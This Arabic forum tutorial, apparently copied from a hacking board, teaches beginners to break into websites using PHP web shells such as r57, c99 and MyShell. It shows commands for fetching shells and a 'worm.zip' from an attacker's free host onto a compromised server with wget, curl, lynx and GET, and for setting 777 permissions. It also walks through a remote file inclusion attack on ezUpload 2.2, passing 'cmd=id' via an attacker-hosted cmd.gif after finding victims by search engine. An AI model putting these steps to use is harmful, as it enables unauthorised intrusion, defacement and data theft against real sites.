    3- phpRemoteView شل جميل ومشابه لخصائص الشل webadmin وكل مجلد تود التعديل عليه استخدم الأسهم المقابلة لها ولكن هذا الشل فيه ميزة جميلة وهي انك تقدر تفك تشفير الــ md5 الخاصة بالمنتديات.

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3



    4- phpshell-1.7 شل جميل وشبيه بالشل MyShell مفيد للمبتدئين

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3




    5- phpFileManager شل سهل جدا وأوامره واضحة ولا يحتاج إلى شرح

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3




    6- r57shell الشل الروسي الغني عن التعريف الذي أنا أفضله من بين كل هذه الشلات وهو يحتاج إلى أوامر لينكس ولكن فيه أوامر البحث عن

    ملفات الكونفج وأوامر سحب الملفات اي الدوال لسحب الملفات جاهزة كلها وفيه ميزة تحميل ملفات من جهازك إلى الموقع المخترق من خلاله

    فقد أضيفت له ثغرات وشغلات جميلة اكتشفها بنفسك ولكن سوف اشرح لكم هذا الشل في نهاية درسنا الممل هههههههههه



    7- phplab شل جميل ولكنه غير عملي ولا انصح المبتدئين به

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3


    8- haexplorer شل أيضا جميل ولكن غير عملي ولا انصح المبتدئين باستخدامه

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3


    9- php exploit lab شل أيضا جميل ولكن أيضا لا انصح المبتدئين به

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3


    10- Ch99 شل جميل ورائع وفيه مميزات جميلة وهي إنك تقدر تخترق قاعدة البيانات من خلاله عن طريق الاختيار sql وهذا الشل يسمحلك

    بتطبيق أوامر لينكس ... بالإضافة إلى إمكانية تصفح الملفات من خلاله كما في الشل webadmin ولكن باختيارات أوسع ...

    &&&

    والآن الحمد لله الكل عرف الشل وأنواعه واستخدامه ولكن في سؤالين مفيش حد سألهم...

    وهي أني من خلال الشرح تكلمت عن شغلتين وهي التصاريح؟؟؟ودوال سحب الملفات؟؟؟

    بالنسبة للتصاريح وأوامر اللينكس فبإمكانك معرفتها من كتاب اللينكس الشامل والذي وضعته قبل ذلك - هنـا -

    وبقي شي واحد وهو دوال السحب وسوف اشرحها بالتفصيل في درسنا اليوم ... لاحقا في وقتها.

    وشباب أكيد مليتوا وأنا أنصحكم روحوا اشربوا فنجان قهوة وارجعوا ههههههههههه

    نكمل ... والآن بعد ما الكل عرف ما هو الشل وأنواعة واستخداماته ......

    راح اشرح لكم الشل الروسي r57 اللي أنا أفضله بين الشلات Shells الباقية


    إليكم شرحه بالصور:



    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN.18


    والآن إليكم الشرح حسب الترقيم في الصورة :::


    1- phpinfo هنا لمشاهدة البرامج المثبتة على السيرفر ...


    2- Safe Mode السيف مود هو حالة آمنة يتم تفعيلها على السيرفر لمنع تطبيق الدوال.


    3- إصدارة اللينكس للسيرفر المخترق مع آخر تحديث له وهو 2005 .


    4- id وهو كما ذكرت صلاحياتك على السيرفر وهي هنــا nobody نو بدي .


    5- pwd مسارك على السيرفر اي مكان تواجدك .


    6- ملفات السيرفر وهي ظاهرة في الصورة واليكم تكملة شرح الشل شوفوا الصورة:
    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN23

    1- هنا تكتب أمر اللينكس مثلا id لمعرفة صلاحياتك


    2- هنا المسار الذي إنت عليه أو اكتب pwd لمعرفة مسارك


    3- هنا للتنفيذ اي عند كتابة أمر اللينكس اضغط على هذا المستطيل (بالعربي اكتب الأمر واضغط انتر) مثل هذا الأمـر مثلاً....

    cd home/domains/admin.com/public_html/vb/data;wget

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3
    -al


    والآن أشرح لكم دوال سحب الملفات ...

    والآن إليكم الشرح وسوف أشرح على الدالة wget ... في البداية كشرح خفيف لمعرفة أن الدالة wget شغالة

    يجب كتابة الأمر which wget وشوفوا الصورة:

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN22

    وكما تلاحظون كتبنا الأمر which wget في مربع تنفيذ الأوامر ونضغط انتر Enter وشوفوا النتيجة

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN.20

    والآن كما تلاحظون ظهر لنا الرد الذي في الصورة وهو usr/bin/wget/ اي أن الدالة شغالة ,,, والآن نكتب أمر السحب ولكن قبل كل ذلك يجب

    أن تتأكد من أن المجلد الذي سوف تسحب الشل له ؛ يملك التصريح 777 ... شوفوا الصورة :::


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN24


    كما تلاحظون الاختيارات:


    1- هذا هو التصريح 777 الذي يجب أن يكون drwxrwxrwx بدون شرطات كما في الصورة السابقة...


    2- هذا هو المجلد الذي سوف نسحب ( = نرفع عليه ) الملف الذي نريد...


    والآن كل شي جاهز ... المجلد ذو التصريح , والملف الذي سوف نسحبه ...

    وأنا هنا سوف اسحب الشل ch99 للتوضيح لا أكثر ... ويمكن إنت بهذه الطريقة أن تسحب الإندكس Index الخاصة بالاختراق ...

    أو أي شي آخر ... والآن اكتب في مكان تنفيذ الأوامر wget

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3


    والشرح لمن يريد ==> wget دالتنا التي سوف نسحب بها الملف...

    والموقع الذي بجنبها رفعنا عليه الشل مضغوط علشان نسحبه للموقع المخترق وعند كتابة الأمـر لن يظهر لك أي رد

    والآن ... نحن رفعناه مضغوط فيجب فك ضغطه بالأمر unzip shell.zip والرد سوف يظهر في الصورة:


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN.19

    كما تلاحظون الرد المحاط بالأحمر يدل على نجاح العملية والآن ماذا لو لم تعمل هذه الدالة؟؟ أقولك ولا يهمك في دوال غيرها مثلا دالة curl

    أيضا إذا أردت التحقق من أن الدالة تعمل ... ما عليك إلا كتابة which curl ... وإليكم شرح بعض دوال السحب

    ولنفترض أن الملف الذي نريد سحبه هو worm.zip

    نبدأ بالأداة lynx وطريقة سحب الملف كما يلي:::

    lynx -source

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3
    > worm.zip

    والأداة curl استخدامها كالتالي :::

    curl -o worm.zip

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3


    وأخيراً الدالة get استخدامها كالتالي

    GET

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3
    > worm.zip


    وكما شرحنا سابقا site.com هو الموقع الذي رفعنا الشل مضغوط ...


    والآن نكمل شرح الشل الروسي ... لنفترض انك عندك ملف وتبي ترفعه للسيرفر ... والملف على جهازك وش تسوي؟؟؟

    أقولك ولا يهمك ... إنزل بالشل للأسفل وشوف الاختيار هذا بالصورة:

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN25

    1- هنا لاختيار الملف من جهازك ومعناه استعراض Browse

    2- هذا الاختيار معناه رفع ... اي عند الانتهاء من اختيار الملف من جهازك اضغط عليه والآن شرح خفيف عن المسار الذي نحن فيه؟؟


    /mounted-storage/home10/sub001/sc15759-CYAT/adult-city.ws/html


    كما تلاحظون المسار الذي نحن فيه نحن لسنا على المجلد الرئيسي

    وأكيد راح تقولي ... شلون عرفت؟؟؟ وأنا أقولك المجلد الرئيسي إما إنه يكون

    public_html

    أو يكون على اسم الموقع كما في مسارنا

    أو يكون www

    وإلي أخره ... حسب السيرفر ... والحين عرفتوا احنا ليش مو على المجلد الرئيسي

    ولكن أكيد راح تقولي أريد أن أكون على المجلد الرئيسي !!! وأنا أقول إنت تأمر...

    نفذ أمر الانتقال من المجلد html ... كالتالي:::


    cd /mounted-storage/home10/sub001/sc15759-CYAT/adult-city.ws/


    مثل ما شفتوا انتقلنا من المجلد html عن طريق الأمر cd وهو يستخدم للدخول إلى مجلد معين وتغيير المسار....

    ------ ووووووووو ------



    وهــذا شرح آخر للـ Shell ( نظري )...

    طريقة الشرح عبارة عن سؤال , وجواب ...

    لكى تصل المعلومة للمبتدء ولو بشكل بسيط

    والموضوع هو عن الشل وأوامره واستخداماته ... إلخ

    ------------

    بسم الله الرحمن الرحيم

    ------------

    ماهو phpshell ؟

    عباره عن سكربت مكتوب بلغة الـphp ويستخدم بالكثير من عمليات الهاكرز

    وهو أساسي لكل مبتدء للسيطرة علي السيرفر بشكل كبير

    ------------

    طيب اذكر لنا بعض الأوامر المهمة ؟

    ماطلب حاجه ... هناك أوامر كثيرة ومنها ...

    Ls

    يستخدم لعرض الملفات الموجوده علي الموقع

    Pwd

    يستخدم لمعرفة مكان تواجدك بالسيرفر او بالموقع

    id

    يستخدم لمعرفة الصلاحيات التى تملكها

    Wget

    يستخدم لسحب ملف الي السيرفر ( رفع ملف : Upload File )

    وهناك الكثير من الأوامر ....

    ------------

    الله يعطيك العافيه طيب الحين أنا تعلمت معني الشل وبعض أوامره. طيب بسألك : له أنواع ولا لأ ؟

    اى نعم له أنواع كثيره

    ------------

    طيب ممكن تذكر لي كم مثال اذا ماعليك كلافه ؟

    ان شاء الله طال عمرك بذكر لك كم نوع

    Myshell

    شل رائع جدا وسهل بنفس الوقت ويسمح لك بالتعديل علي الملفات

    وتستطيع تعديل الاندكس Index بواسطة الامر

    Edit index.php

    ( بشكل مختصر )

    التحميل ...


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3




    ------------



    R57shell 1.22

    شل روسي به العديد من المميزات

    ومنها رفع ملف من جهازك الي الموقع مباشره

    دون استخدام اى امر من اوامر لينكس

    والاتصال بالباكدور سوا بلغة البيرل او السي

    واظهار معلومات عن السيرفر من اصدار كيرنل ونوع ... إلخ

    ( بشكل مختصر )

    التحميل ...


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3




    ------------



    R57shell 1.23

    ايضا شل روسي

    وبه الكثير من المميزات الغير موجوده

    بالشل السابق ومنها الاتصال بقاعده البيانات

    واخذ نسخه من قاعده البيانات وايضا يوفر

    الشل باكدور ولكنه غير فعال لتوفر جدار الحمايه

    والكثير .. إلخ

    ( بشكل مختصر )

    التحميل ...


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3




    ------------

    ' ويوجد العديد من الانواع '

    ------------

    الحمدلله ؛ لحد الآن فاهم معاك : طيب ممكن اعرف كيف ارفع الشل علي موقع او منتدى ؟

    هناك ثغرات عديده تسمح لك بتطبيق اوامر اللينكس وتستطيع رفع شل او باكدور علي الموقع

    ------------

    رائع طيب اذكر لي ثغره ؟

    من عيوني توجد ثغره تسمح لك بتطبيق اوامر اللينكس

    وراح اشرحها لخاطرك

    الثغره في السكربت ezUpload

    وبالتحديد بالاصدار 2.2

    ------------

    الله يعطيك العافيه وفهمت من كلامك انى ابحث بقوقل كذا ezUpload 2.2 ؟

    نعم تبحث بقوقل مثل ماذكرت كذا ezUpload 2.2

    ------------

    طيب وبحثت وحصلت لي موقع كيف استغل الثغره ؟

    سؤال حلو وراح اجاوبك عليه اخوى والملفات المصابه من السكربت هي التاليه ..

    customize.php

    index.php

    forum.php

    initialize.php

    يعني حصلنا موقع مصاب وخلنا نقول هالموقع


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3


    ومثل ماذكرت لك الملفات المصابه هي ...

    customize.php

    index.php

    forum.php

    initialize.php

    يعني ناخذ اى ملف ونحطه ورا الرابط وخلنا نقول هالملف customize.php

    يعني راح يصير الرابط كذا ..


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3


    وتبي تقول لي ماصار شيء وش استفد بقول لك لا تستعجل كل شيء بوقته

    الحين بقولك ارفع cmd.gif على موقعك المجانى.

    ------------

    طيب بس سؤال واسف علي المقاطعه اذا ممكن ؟

    تفضل اسأل اخوى ولا تعودهآ

    ------------

    ان شاء الله حبيت أعرف وش هي يعني cmd.gif مو حلوه أرفعها ولا أدري وش فايدتها ؟

    سؤال جيد بقول لك هذى تسمح لك بتطبيق اوامر اللينكس ( سبق شرحها فى الأعلي ) وتفضل حملها


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3


    ------------

    طيب بس سؤال ثاني لو سمحت . يعني بس تيجي كده cmd.gif ولا فى نوع ثاني؟

    ايضا سؤال جيد نعم اخوى ممكن تجىء كذا cmd.gif وايضا ممكن تيجى كذا cmd.txt ..إلخ

    ------------

    طيب تفضل اخوى كمل شرحك اذا ممكن ؟

    ان شاء الله طال عمرك صرت صبي عندك لؤؤؤؤل لا امزح معك يالله نكمل

    مثل ماقلت لك اخترنا هالملف customize.php

    وصار رابط الموقع كذا


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3


    الحين بقولك هات رابط الـ cmd.gif بعدما رفتعها على موقعك

    الحين عندنا الملفات المصابه وموقع مصاب و cmd.gif

    بقول لك الان راح يكون رابط الموقع مع رابط cmd.gif كذا ..


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3


    طيب تبي تقول ماصار شيء بقول لك ضيف بعد الرابط التالي ..

    ?&cmd=id

    يعني راح يكون الرابط كذا


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3


    وراح يطلع لك التالي .. مثلا ..

    uid=99(nobody) gid=99(nobody) groups=99(nobody)

    ------------

    طيب اخوى دكتور جرح بس سؤال وش معني اللى ظهر لي ؟

    انا شرحت لك ياخوى اول شيء ان هالامر id معناته يظهر صلاحيتك

    وصلاحيتك الان nobody

    ------------

    مقاطعه " نكتب الامر التالي عشان نعرف احنا وين بالضبط واللى هو الامر .. "

    Pwd

    ------------

    طيب مشكور اخوي تفضل كمل الشرح اذا ماعليك امر ؟

    امري لله وبكمل معاك للنهايه واشوف وش تاليها معاك

    ------------

    الحين ظهرت صلاحيتا يالطيب بقول لك اول شيء نكتب الامر التالي ..

    which wget

    وادري تبي تقول : وش هالامر ؟ بقول لك هالامر يشوف نقدر نسحب ملف علي الموقع ولا لأ

    يعني بالعربي اقدر ارفع ملف ولا لأ

    يالله نكتبه ونشوف وش يظهر لنا

    ------------

    طيب بس سؤال وين اكتب الامر ؟

    اخوى الامر نكتبه بدال id يعني راح نحذفها ونحط محلها which wget

    ------------

    طيب كمل اخوى دكتور جرح ...

    ابشر راح اكمل لخاطرك ...

    حلو ظهر لنا مثلا .. /usr/bin/wget وادري تبي تلقف

    وتقول وش اللى ظهر لنا مافهمت !

    بقول لك يعني نقدر نرفع ملف علي الموقع

    بالعربي مسموح لنا نرفع

    طيب الحين نبي نرفع اى شل من اللى شرحتهم انا

    امممم

    نقول Myshell احلي والله واعزه كثير

    يالله ياخوى خلنا نرفع ونفتك من هالموقع ومنك لؤؤل

    الحين بقول لك ارفع الشل علي موقعك المجانى ( الموقع راح فيها لؤؤل )

    ------------

    مافهمت وضح لي اكثر لو سمحت ؟

    طيب انت الان بعد ماحملت الشل ارفعه علي موقعك المجانى بصيغه zip يعني وين زاب

    طيب فهمت عليك

    ------------

    ياريت تكمل طال عمرك ...

    ابشر راح اكمل معاك

    الحين بقول لك جيب رابط الشل بعد مارفعته علي موقعك المجانى

    وخلنا نرفعه علي الموقع االلى نطبق عليه من اليوم

    وادري ياخوي بتقول كيف ارفع والله ؟ ادري

    بقول لك انا قلت لك بالبدايه هالامر wget وظيفته الرفع علي الموقع

    طيب يالله خلنا نرفع

    بس بقول لك صبر قبل لا نرفع خل نشوف لنا ملف تصريحه 777

    ------------

    طيب بس سؤال ليش ملف تصريحه 777 ؟

    عشان ياخوى تقدر تستخدم اى امر فيه

    من قراءه : Read ، كتابة : Write , رفع : Upload ، تعديل : Edit ... إلخ

    ------------

    طيب فهمت عليك يالله كمل اخوى ..

    ان شاء الله بكمل والحين نعرض الملفات مع تصاريحها بالامر ls –l

    ظهرت لنا الملفات مع تصاريحها

    ونشوف الملف اللى تصريحه 777 ويجيك كذا ..

    rwxrwxrwx

    طيب ياخوي تبي تقول ماحصلت ملف وش اسوى ؟

    بقول لك عط تصريح لاي ملف وان شاء الله مسموح لك

    ------------

    طيب ياخوي ما اعرف كيف اعطي تصريح لملف ممكن تقول لي الطريقه ؟

    ان شاء الله اخوى الطريقه كالتالي ..

    Chmod 777 filename

    ------------

    طيب اخوى ممكن توضح اكثر لانى مو عارف شيء ؟

    ابشر اخوي راح اوضح لك اكثر وبقول لك ..

    Chmod = يستخدم هالامر لاعطاء التصريحات للملفات

    777 = تصريح رقم 777 وذكرت وش معناته

    Filename = اسم الملف اللى نبي نعطيه التصريح رقم 777

    ------------

    طيب فهمت عليك الله يجزاك خير كمل ...

    يالله نكمل تبي تقول عطيته تصريح وابي اتآكد انه يملك التصريح 777 بقول لك اعرض الملفات من جديد مع تصاريحها بالامر ls –l

    وراح تحصل الملف اللى عطيته التصريح

      الوقت/التاريخ الآن هو الجمعة أبريل 26, 2024 1:21 pm